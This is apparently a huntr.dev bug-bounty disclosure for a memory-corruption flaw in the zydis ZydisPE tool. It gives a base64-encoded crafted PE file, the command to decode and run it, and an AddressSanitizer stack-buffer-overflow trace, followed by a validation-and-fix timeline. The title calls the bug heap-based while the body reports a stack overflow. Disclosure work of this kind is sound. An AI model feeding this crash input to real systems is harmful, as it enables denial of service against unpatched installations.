Heap-based Buffer Overflow in zyantific/zydis

Valid

Reported on

Nov 3rd 2021


As discussed in the report at https://www.huntr.dev/bounties/96b0a482-7041-45b1-9327-c6a4a8f32d3a/, I am re-opening the report here for proper tracking.

Description

Hello, we hope you're doing well during these challenging times. Whilst testing zydis built from commit 077b185 with Clang12 + ASan on Ubuntu 18.04, we discovered a crafted PE file that when fed to ZydisPE triggers a stack-buffer-overflow during a memcpy operation in the zycore-c dependency, with a WRITE of size 20479.

Proof of Concept

Base64 POC

TVpxRnBEPScKAAAQAPgAAAAAAAAAAQAIQAAAAAAAAAAAAAAASlQAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA+AoAALJA6wDrFJCQ6wZIg+wIMdK9AADrBemmEAAA/A8fhz7gvwBwMcmOwfqO14nM+w4f6AAA
XoHucgC4AAJQUAcx/7kAAvOkDx+H0v/qjiAAAI7ZuQAbuFAAjsAxwDH/86qA+kB0E+gVAAewATHJ
MPa/GADoSABPdfrqGCUAAFNStAjNE3IsiM+A5z+A4cDQwdDBhs0eBh8x9o7GvhAVh/elpaWlpaQf
k6uRq5KrWKqSW8NagPKAMcDNE3L368FQUYbN0MnQyQjBMduwAbQCzRNZWHIdjMaDxiCOxv7AOgYc
FYsNsAH+xjo2IBV2AzD2QcNQMcDNE1jrxYn+rITAdAm7BwC0Ds0Q6/LDV792JOjo/1/o5P+/fiTo
3v/zkOv8uQQAvgAErYXAdAtRVpe+nCToBQBeWeLuw4n6hdJ0FFJWMcmxAwHKrF4MgO5arO5CSXn6
wwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVaon
CiMnIgpvPSIkKGNvbW1hbmQgLXYgIiQwIikiCmlmIFsgLWQgL0FwcGxpY2F0aW9ucyBdOyB0aGVu
CmRkIGlmPSIkbyIgb2Y9IiRvIiBicz04IHNraXA9IiAgICAgMzk0IiBjb3VudD0iICAgICAgODci
IGNvbnY9bm90cnVuYyAyPi9kZXYvbnVsbAplbGlmIGV4ZWMgNzw+ICIkbyI7IHRoZW4KcHJpbnRm
ICdcMTc3RUxGXDJcMVwxXDAxMVwwXDBcMFwwXDBcMFwwXDBcMlwwXDA3NlwwXDFcMFwwXDBcMDAw
XDAyMVwxMDBcMDAwXDAwMFwwMDBcMDAwXDAwMFwzNTBcMDExXDAwMFwwMDBcMDAwXDAwMFwwMDBc
MDAwXDAwMFwwMDBcMDAwXDAwMFwwMDBcMDAwXDAwMFwwMDBcMFwwXDBcMFwxMDBcMFwwNzBcMFww
MDRcMDAwXDBcMFwwMDBcMDAwXDAwMFwwMDAnID4mNwpleGVjIDc8Ji0KZWxzZQpleGl0IDEKZmkK
ZXhlYyAiJDAiICIkQCIKUj0kPwoKaWYgWyAkUiAtZXEgMTI2IF0gJiYgWyAiJCh1bmFtZSAtbSki
ICE9IHg4Nl82NCBdOyB0aGVuCmlmIFE9IiQoY29tbWFuZCAtdiBxZW11LXg4Nl82NCkiOyB0aGVu
CmV4ZWMgIiRRIiAiJDAiICIkQCIKZWxzZQplY2hvIGVycm9yOiBuZWVkIHFlbXUteDg2XzY0ID4m
MgpmaQplbGlmIFsgJFIgLWVxIDEyNyBdOyB0aGVuCiAgZXhlYyAiJG8iICIkQCIKZmkKZXhpdCAk
UgplcnJvcjogAA0KAGNwdWlkAG9sZHNrb3NsAGU4MjAAbm9sb25nAAwAAEM4AKwkAAAAAAAAAAAA
AAAAAAAAAP//AAAAmg8A//8AAACSDwD//wAAAJrPAP//AAAAks8A//8AAACbrwD//wAAAJOvAAKw
rRsAAAEA/k9R5OQEAAAAABAAADAQAAAAEQAEBQAAagCdskAPIMCD4P4PIsBm6logAADo4wvoPvzo
2gvoAADoDADotgDoaQDoHQHoegGcWPbEgHVMZpxmWGaJwWa7AAAgAGYx2GZQZp1mnGZYZjnBdDlm
CdhmUGadZr8AAACAZon4ZkcPomY5+HwbZon4D6JmvwAAACBmIfpmOfp1CDHAw7+HJOsIv5Uk6wO/
gSTosfu/UQCOx2Yx/2Yx22a4IOgAAGa5GAAAAGa6UEFNU80VciNmOdB1HoXJgw6D+RVyBvZFFAF1
A4PHGGaF23QGgf8AEHLIw7+QJOhn+/oeMcCOwEiO2L8ABb4QBSaKBVCKBFAmxgUAxgT/JoA9/1iI
BFgmiAUfdUC4AQDoLACwreZk6CUAsNDmZOglAORgUOgYALDR5mToEQBYDALmYOgJALCu5mToAgDr
o+RkqAJ1+sPkZKgBdPrD+8MeuAB5jthmxwYAUAPQBwBmxwYAWAPABwBmxwYAQAOwBwBmxwYAMAOg
BwBmxwYAIAOQBwBmxwYAEAOQBwC5AAJmuAMA6f8x9maJBGYFABAAAIPGCOLyZrgA4AcADyLYH8P6
DwEeIhUPIOBmDaACAAAPIuBmuYAAAMAPMmYNAQEAAA8wDwEWoCQPIMBmDQMAAIBmg+D7DyLA6ukm
KABqMFiO2I7QjsCO4I7ovAAACABFMeRFMe1FMfZFMf8x2zHtVUjHxwAFAAAPIN66ACAAAOjgCAAA
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
cB9AAHYISIPrCP8T6+9EizW9IwAARYX2dDRIg+wgSIsdTQcAAEyLLS4HAABq9llB/9VEifJIicH/
02r1WUH/1boHAAAASInB/9NIg8QgRInn6F0AAABIifxIifBIiddIic5MicJMiclIMe3/0A8Lif8x
wIP/f3YgD73PiwxNmhpAAIn6we/+yXXsCOhICfjDjUf3g/gED5bAg/8gD5TCCdAPtsDDkJBVixXg
FgAASInl9sIGdBj2wgJ0HosFZRYAAMHoCDMFWBYAADw0dQtIiwXZFgAADwXrF4DiBHQSSIPsIEAP
ts//FToGAABIg8QgagBqAPoPARwkDwvr/CX/DwAAPf8PAAB0H0mJylVIieUPBV1IPQHw//9zAcP3
2IkFpiIAAGr/WMOLBXgWAADr7kjB6DTrDUjB6CjrB0jB6BwPt8Al/w8AAGY9/w902kmJyg8FcsnD
QYnDQUw9MQB4AHQAZQByAG0ALQB0AHIAdQBlAGMAbwBsAG8AcgAAAFQARQBSAE0AAABmDx9EAAAY
AAAAAAAAAAAAAP/fAAAAAQAAAAAAAAABwAHAAcABwALgAuAC4ALgAuAD8APwA/AD8APwBPgE+AT4
BPgE+AX8BfwF/AX8BfwF/AAAa2VybmVsMzKAZGxsAApDb3Ntb3BvbGl0YW4KQ29weXJpZ2h0IDIw
MjAgSnVzdGluZSBBbGV4YW5kcmEgUm9iZXJ0cyBUdW5uZXkKClBlcm1pc3Npb24gdG8gdXNlLCBj
b3B5LCBtb2RpZnksIGFuZC9vciBkaXN0cmlidXRlIHRoaXMgc29mdHdhcmUgZm9yCmFueSBwdXJw
b3NlIHdpdGggb3Igd2l0aG91dCBmZWUgaXMgaGVyZWJ5IGdyYW50ZWQsIHByb3ZpZGVkIHRoYXQg
dGhlCmFib3ZlIGNvcHlyaWdodCBub3RpY2UgYW5kIHRoaXMgcGVybWlzc2lvbiBub3RpY2UgYXBw
ZWFyIGluIGFsbCBjb3BpZXMuCgpUSEUgU09GVFdBUkUgSVMgUFJPVklERUQgIkFTIElTIiBBTkQg
VEhFIEFVVEhPUiBESVNDTEFJTVMgQUxMCldBUlJBTlRJRVMgV0lUSCBSRUdBUkQgVE8gVEhJUyBT
T0ZUV0FSRSBJTkNMVURJTkcgQUxMIElNUExJRUQKV0FSUkFOVElFUyBPRiBNRVJDSEFOVEFCSUxJ
VFkgQU5EIEZJVE5FU1MuIElOIE5PIEVWRU5UIFNIQUxMIFRIRQpBVVRIT1IgQkUgTElBQkxFIEZP
UiBBTlkgU1BFQ0lBTCwgRElSRUNULCBJTkRJUkVDVCwgT1IgQ09OU0VRVUVOVElBTApEQU1BR0VT
IE9SIEFOWSBEQU1BR0VTIFdIQVRTT0VWRVIgUkVTVUxUSU5HIEZST00gTE9TUyBPRiBVU0UsIERB
VEEgT1IKUFJPRklUUywgV0hFVEhFUiBJTiBBTiBBQ1RJJU4gT0YgQ09OVFJBQ1QsIE5FR0xJR0VO
Q0UgT1IgT1RIRVIKVE9SVElPVVMgQUNUSU9OLCBBUklTSU5HIE9VVCBPRiBPUiBJTiBDT05ORUNU
SU9OIFdJVEggVEhFIFVTRSBPUgpQRVJGT1JNQU5DRSBPRiBUSElTIFNPRlQIOcZ08kiYSGsfRAAA
AABDcmVhdGVGaWxlTWFwcGluZ051bWFXAAAAAEV4aXRQcm9jZXNzAAAARnJlZUVudmlyb25tZW50
U3RyaW5nc1cAAABHZXRDb21tYW5kTGluZVcAAABHZXRDb25zb2xlTW9kZQAAAABHZXRFbnZpcm9u
bWVudFN0cmluZ3NXAAAAAEdldFN0ZEhhbmRsZQAAAABNYXBWaWV3T2ZGaWxlRXhOdW1hAAAAU2V0
Q29uc29sZUNQAAAAAFNldENvbnNvbGVNb2RlAAAAAFNldENvbnNvbGVPdXRwdXRDUAAAAABTZXRF
bnZpcm9ubWVudFZhcmlhYmxlVwAIHwAAAAAAAAAAAADcGgAAACAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA6B0AAAAAAAACHgAAAAAAABAeAAAAAAAAKh4AAAAAAAA8HgAAAAAAAE4eAAAAAAAAaB4AAAAA
AAB4HgAAAAAAAI4eAAAAAAAAnh4AAAAAAACwHgAAAAAAAMYeAAAAAAAAAAAAAAAAAACQTgEm5wFO
AU4BAf8fToGAgBBmLg8fhAAAAAAAZi4PH4QAAAAAAGYuDx+EAAAAAABmLg8fhAAAAAAAZi4PH4QA
AAAAAGYuDx+EAAAAAABmLg8fhAAAAAAAZi4PH4QAAAAAAGYuDx+EAAAAAABmLg8fhAAAAAAAZi4P
H4QAAAAAAGYuDx+EAAAAAABmDx9EAAA=

decode base64 > /tmp/file.fuzz ./ZydisPE /tmp/file.fuzz

WRITE of size 20479 at 0x7ffe2bcf31e0 thread T0
    #0 0x36f4f9 in __asan_memcpy (/root/zydis/build/ZydisPE+0x36f4f9)
    #1 0x435bb6 in ZyanStringAppend /root/zydis/dependencies/zycore/src/String.c:462:5
    #2 0x3aff40 in ZydisFormatterPrintAddress /root/zydis/tools/ZydisPE.c:912:9
    #3 0x3af822 in ZydisFormatterPrintAddressABS /root/zydis/tools/ZydisPE.c:930:12
    #4 0x421d52 in ZydisFormatterIntelFormatInstruction /root/zydis/src/FormatterIntel.c:114:22
    #5 0x3efc60 in ZydisFormatterFormatInstructionEx /root/zydis/src/Formatter.c:472:5
    #6 0x3aba9c in DisassembleMappedPEFile /root/zydis/tools/ZydisPE.c:1068:22
    #7 0x3aba9c in main /root/zydis/tools/ZydisPE.c:1174:10
    #8 0x7f410ae1f564 in __libc_start_main csu/../csu/libc-start.c:332:16
    #9 0x2f4e3d in _start (/root/zydis/build/ZydisPE+0x2f4e3d)

Address 0x7ffe2bcf31e0 is located in stack of thread T0 at offset 3136 in frame
    #0 0x3a4c3f in main /root/zydis/tools/ZydisPE.c:1095

  This frame has 31 object(s):
    [32, 40) 'size.i125' (line 487)
    [64, 72) 'string.i126' (line 492)
    [96, 104) 'size.i' (line 487)
    [128, 136) 'string.i118' (line 492)
    [160, 180) 'decoder.i' (line 981)
    [224, 808) 'formatter.i' (line 991)
    [944, 2448) 'instruction.i' (line 1007)
    [2576, 2712) 'symbol.i' (line 1026)
    [2784, 2792) 'found_index.i89' (line 1029)
    [2816, 2824) 'element.i90' (line 1035)
    [2848, 2856) 'string.i' (line 1038)
    [2880, 3136) 'format_buffer.i' (line 1067)
    [3200, 3208) 'size.i.i' (line 487) <== Memory access at offset 3136 partially underflows this variable
    [3232, 3240) 'string.i.i' (line 492) <== Memory access at offset 3136 partially underflows this variable
    [3264, 3400) 'element.i' (line 544) <== Memory access at offset 3136 partially underflows this variable
    [3472, 3536) 'module_name.i' (line 563) <== Memory access at offset 3136 partially underflows this variable
    [3568, 3576) 'index.i' (line 572) <== Memory access at offset 3136 partially underflows this variable
    [3600, 3664) 'symbol_name103.i' (line 601) <== Memory access at offset 3136 partially underflows this variable
    [3696, 3704) 'found_index.i' (line 611) <== Memory access at offset 3136 partially underflows this variable
    [3728, 3792) 'module_name156.i' (line 632) <== Memory access at offset 3136 partially underflows this variable
    [3824, 3832) 'index170.i' (line 641) <== Memory access at offset 3136 partially underflows this variable
    [3856, 3864) 'found_index206.i' (line 666) <== Memory access at offset 3136 partially underflows this variable
    [3888, 3952) 'symbol_name229.i' (line 683) <== Memory access at offset 3136 partially underflows this variable
    [3984, 4120) 'element278.i' (line 717) <== Memory access at offset 3136 partially underflows this variable
    [4192, 4256) 'module_name308.i' (line 736) <== Memory access at offset 3136 partially underflows this variable
    [4288, 4352) 'symbol_name341.i' (line 764) <== Memory access at offset 3136 partially underflows this variable
    [4384, 4392) 'found_index356.i' (line 774) <== Memory access at offset 3136 partially underflows this variable
    [4416, 4480) 'module_name402.i' (line 795) <== Memory access at offset 3136 partially underflows this variable
    [4512, 4520) 'found_index424.i' (line 819) <== Memory access at offset 3136 partially underflows this variable
    [4544, 4608) 'symbol_name450.i' (line 836) <== Memory access at offset 3136 partially underflows this variable
    [4640, 4776) 'context' (line 1169) <== Memory access at offset 3136 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/root/zydis/build/ZydisPE+0x36f4f9) in __asan_memcpy

Impact

Crashing the software, local denial of service, maybe arbitrary code execution?

References

We are processing your report and will contact the zyantific/zydis team within 24 hours. a year ago
We have contacted a member of the zyantific/zydis team and are waiting to hear back a year ago
Joel Höner validated this vulnerability a year ago
geeknik has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joel Höner confirmed that a fix has been merged on 330b25 10 months ago
The fix bounty has been dropped
to join this conversation